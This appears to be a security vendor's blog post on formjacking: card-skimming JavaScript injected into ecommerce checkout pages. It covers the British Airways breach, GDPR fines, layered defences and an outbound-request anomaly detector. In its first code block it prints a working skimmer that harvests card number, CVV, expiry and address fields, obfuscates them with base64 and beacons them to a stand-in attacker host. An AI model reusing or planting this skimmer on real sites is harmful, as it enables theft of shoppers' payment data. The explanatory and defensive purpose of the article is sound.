Formjacking – How it can Affect your Ecommerce Site

Data theft by skimming is not a new problem; it has probably been around since the birth of the paper form. Today it is still with us, on a much wider scale, riding on the internet and the growth of online shopping.

A popular modern tactic for data skimming is called formjacking.

Not heard of it? 

Formjacking enables organised criminals to steal sensitive customer data as it is entered into an ecommerce shop. To the end user, this process is invisible. Worse still, it is often invisible to the online store as well.

News stories mentioning formjacking are breaking on an almost daily basis. Interestingly, the affected organisations are well established, very credible and trusted brands who will have invested millions into a multi-layered, highly sophisticated IT security strategy. 

In 2018 British Airways famously had to admit that payment details from around 380,000 transactions had been stolen. Earlier that year the ticketing giant Ticketmaster had disclosed a similar incident, delivered through a compromised third-party chat script. Github, the Wall Street Journal and Vision Direct have had incidents of their own. The list goes on. For me, it is the most relevant threat to ecommerce since the birth of the Distributed Denial of Service (DDoS) attack in the early 2000s.

So, here’s what you need to know about formjacking and how to protect your e-commerce website.

What is Formjacking?

Formjacking came to light in late 2018 in a series of data security bulletins from Symantec. Symantec describes formjacking as software that does in the virtual world what card skimmers do in the real world: Just as a skimmer steals personal data from your physical credit card at the moment you swipe it at a petrol station or ATM, a site infected with formjacking code captures your data as you submit it to an online order form. It’s then transmitted to data thieves.

Reports vary but an estimated 5,500 online stores get formjacked each month. That’s because formjacking is relatively easy to implement, hard to detect and provides a very lucrative revenue stream for the perpetrators.

In simple terms, all it takes is for the attacker to insert malicious JavaScript into the ecommerce site. That script captures whatever the customer types into the payment and billing fields and sends it to an external host the attacker controls, all done silently, without disrupting the customer's shopping experience.
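To make the mechanics concrete, here is an added example (written for this page, not code from any real incident or from RapidSpike) that models a skimmer in JavaScript. The exfiltration host, the form selector and the field names are assumptions, and a small fake DOM stands in for the browser so the model runs under Node.

```javascript
// Skeleton of a formjacking skimmer, reconstructed here to show the mechanics.
// It hooks the checkout form's submit event, copies the fields the customer
// typed, and sends them to a host the attacker controls while the real order
// submission continues untouched. All hosts and field names are hypothetical.

const EXFIL_URL = "https://stats-cdn.example/collect"; // hypothetical attacker-controlled host

// Field names worth stealing: card data plus enough identity to resell the card.
const TARGET_FIELDS = /^(card(number|_number)?|cc|cvv|cvc|exp(iry|_month|_year)?|name|email|address|postcode|zip)$/i;

// Copy only the interesting, non-empty fields from a form's elements.
function harvest(form) {
  const stolen = {};
  for (const el of form.elements) {
    if (el.name && el.value && TARGET_FIELDS.test(el.name)) stolen[el.name] = el.value;
  }
  return stolen;
}

// Wrap the loot in base64 so a naive "cardnumber=" grep on traffic misses it.
function buildBeacon(stolen, pageUrl) {
  const body = Buffer.from(JSON.stringify({ page: pageUrl, data: stolen })).toString("base64");
  return { url: EXFIL_URL, body };
}

// Attach to the checkout form. `send` stands in for navigator.sendBeacon / fetch.
function installSkimmer(doc, send) {
  const form = doc.querySelector("form#checkout");
  if (!form) return false;
  form.addEventListener("submit", () => {
    const stolen = harvest(form);
    if (Object.keys(stolen).length > 0) send(buildBeacon(stolen, doc.location.href));
    // No preventDefault() and no change to the form's action: the order goes
    // through normally, so neither the customer nor the shop's server sees
    // anything unusual.
  });
  return true;
}

// Constructed stand-in for the browser DOM so the model runs under Node.
function fakeCheckoutPage(values) {
  const submitHandlers = [];
  const form = {
    elements: Object.entries(values).map(([name, value]) => ({ name, value })),
    addEventListener: (type, fn) => { if (type === "submit") submitHandlers.push(fn); },
    submit: () => submitHandlers.forEach((fn) => fn()),
  };
  return {
    location: { href: "https://shop.example/checkout" },
    querySelector: (selector) => (selector === "form#checkout" ? form : null),
    form,
  };
}

// Drive one checkout and return every beacon the skimmer would have sent.
function runScenario() {
  const sent = [];
  const doc = fakeCheckoutPage({
    cardnumber: "4111111111111111", // test PAN, not a real card
    expiry: "12/26",
    cvv: "123",
    email: "customer@example.org",
    newsletter: "yes", // not on the target list, so it is left alone
  });
  installSkimmer(doc, (beacon) => sent.push(beacon));
  doc.form.submit();
  return sent;
}

console.log(runScenario());
```

The two things to notice are that the skimmer never touches the form's action or prevents the submit, which is why the shop's own server logs look normal, and that the only trace is one extra outbound request from the customer's browser to a host the shop has never talked to.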

The data that’s skimmed or stolen is then sold on the dark web. Figures vary but the data formjacked from the British Airways site has been reportedly sold for as much as $50 per record ($50 x 380,000 = $19,000,000).

What websites are at risk from formjackers?

Obviously the large ecommerce brands are at risk, but, as with other forms of cyber threat, small to mid-size organisations are targeted too. Smaller businesses have fewer resources and smaller security budgets, which makes them easier to compromise.

The sweet spot for the formjacking gangs is organisations that process large volumes of customer data. Those let the attacker capture more personal information faster, which in turn generates more revenue, faster.

They also look for sites that use third-party JavaScript. Web chats, advertisements and marketing analytics tools (Google Analytics, for example) all run as embedded scripts. The more there are the better, because that gives the formjacker more cover. Some sites load hundreds of third parties, all sending data to external destinations, so it becomes increasingly hard to spot the malicious impostor among them.

Formjacking creates data breach liabilities

The security industry often says that buyers switch to a competitor's website after the negative press that follows a breach. Whilst I am sure this is true, speaking personally I am not convinced how strong an argument it is. It wouldn't stop me, for example, using a large organisation such as British Airways. It might, however, make me look for an alternative further down the ecommerce food chain.

The most tangible threat really comes in the form of regulatory fines and prosecutions. With increasingly strong regulations in force, such as the GDPR and the pending ePrivacy Regulation, organisations are more financially liable for data breaches than ever. In the case of British Airways, the ICO's proposed fine of £183M was issued under the GDPR and amounted to roughly 1.5% of the airline's annual turnover. The regulation allows a maximum of 4% of turnover, which would have been nearer £520M.

How can you protect your website from formjacking?

This is a tough paragraph to write because preventing, or even detecting, a formjacking attack is very difficult. Like all security challenges, there is no silver bullet. It requires a layered, defence-in-depth approach that starts with the basics: patching and vulnerability elimination. The JavaScript your site serves is stored on your servers (or your suppliers'), so a fully patched server with no known vulnerabilities gives you an immediate head start. In the BA attack, believe it or not, the attackers used a known vulnerability on a public-facing web server to get in.

Some security experts suggest analysing firewall and server logs for suspicious activity. That raises the question: who has the resources and time to monitor these logs consistently over time? With log management tools it is often difficult to see the wood for the trees, and in any case the skimmed data leaves the customer's browser, not your servers, so your own server logs may never record it.

Obfuscating your own JavaScript is sometimes suggested, but it only deters an opportunistic attacker; a determined one will work through it given time. The more fundamental problem is that the JavaScript on a busy site changes constantly, so any control based on watching the scripts themselves (including Subresource Integrity hashes on third-party scripts and a Content Security Policy that limits where the page may send data) has to be maintained as the site and its suppliers change, and that upkeep is where most such solutions fail.

One way to spot a formjacking attack in progress is to look for data unexpectedly leaving your site. This is basically what we do at RapidSpike: we focus on where the browser is sending data and base our alerts on anomalies. The theory is that to steal data the attacker ultimately has to send it somewhere, and if that somewhere is new or abnormal it should be flagged.
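As an added example of the approach described here and in the log-analysis paragraph above (illustrative code written for this page, not RapidSpike's product or any real monitoring feed), the following JavaScript replays a constructed record of the requests a browser made during one checkout against a baseline of known destinations. The hostnames and the session records are assumptions.

```javascript
// Added example: flag requests that leave a checkout page for a destination
// the store has never sent data to before. The session records below are
// constructed; in practice they would come from a synthetic browser run,
// a proxy log or a Content-Security-Policy report endpoint. Hostnames are
// hypothetical.

// Destinations the store is known to talk to (learned from earlier clean runs).
const BASELINE_HOSTS = new Set([
  "shop.example",          // first party
  "google-analytics.com",  // any subdomain of a baselined domain is accepted
  "cdn.widgets.example",   // hypothetical chat-widget vendor
]);

// Constructed record of every request a browser made during one checkout.
const SESSION = [
  { url: "https://shop.example/checkout", initiator: "navigation", method: "GET" },
  { url: "https://cdn.widgets.example/chat.js", initiator: "https://shop.example/checkout", method: "GET" },
  { url: "https://www.google-analytics.com/collect?v=1&t=pageview", initiator: "https://www.google-analytics.com/analytics.js", method: "POST" },
  { url: "https://shop.example/api/order", initiator: "https://shop.example/checkout", method: "POST" },
  // The odd one out: the chat widget posting somewhere it never did before.
  { url: "https://stats-cdn.example/collect", initiator: "https://cdn.widgets.example/chat.js", method: "POST" },
];

function hostOf(url) {
  return new URL(url).hostname.toLowerCase();
}

// True if the host, or any parent domain of it, is in the baseline. Matching
// walks the labels from the left, so "google-analytics.com.evil.example" is
// not accepted on the strength of "google-analytics.com".
function isBaselined(host, baseline) {
  const labels = host.toLowerCase().split(".");
  for (let i = 0; i < labels.length - 1; i++) { // never match a bare TLD
    if (baseline.has(labels.slice(i).join("."))) return true;
  }
  return false;
}

// Every request to a non-baselined host, with the script that triggered it,
// which is the file to pull apart first. POSTs and GETs carrying a query
// string are marked as carrying data; a bare GET could still be a tracking
// pixel, so it is reported at lower severity rather than ignored.
function findAnomalies(session, baseline = BASELINE_HOSTS) {
  const anomalies = [];
  for (const req of session) {
    const host = hostOf(req.url);
    if (isBaselined(host, baseline)) continue;
    const carriesData = req.method !== "GET" || new URL(req.url).search.length > 0;
    anomalies.push({
      host,
      url: req.url,
      method: req.method,
      loadedBy: req.initiator === "navigation" ? "page" : hostOf(req.initiator),
      severity: carriesData ? "data-leaving-site" : "new-host",
    });
  }
  return anomalies;
}

for (const a of findAnomalies(SESSION)) {
  console.log(`${a.severity}: ${a.method} ${a.url} (triggered by ${a.loadedBy})`);
}
```

Two design points matter in practice. The check is an allowlist rather than a blocklist because skimmer gangs register lookalike domains that no reputation feed has seen yet, and the initiator is recorded alongside the host because the anomaly is rarely in a first-party file: it is usually one of the legitimate third-party scripts that has started talking to someone new, and that is the script to diff against a known-good copy.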

The short answer is: all of the above 

Good old defence in depth is the best approach, but it isn't cheap and it requires time and the relevant skills. That is a challenge for organisations of all sizes, but one thing is for sure: formjacking is something we are all going to have to live with and constantly defend against.

Detect website skimming, formjacking and supply chain attacks. Easily protect against unauthorised changes to your critical JavaScript files with RapidSpike Magecart Detection.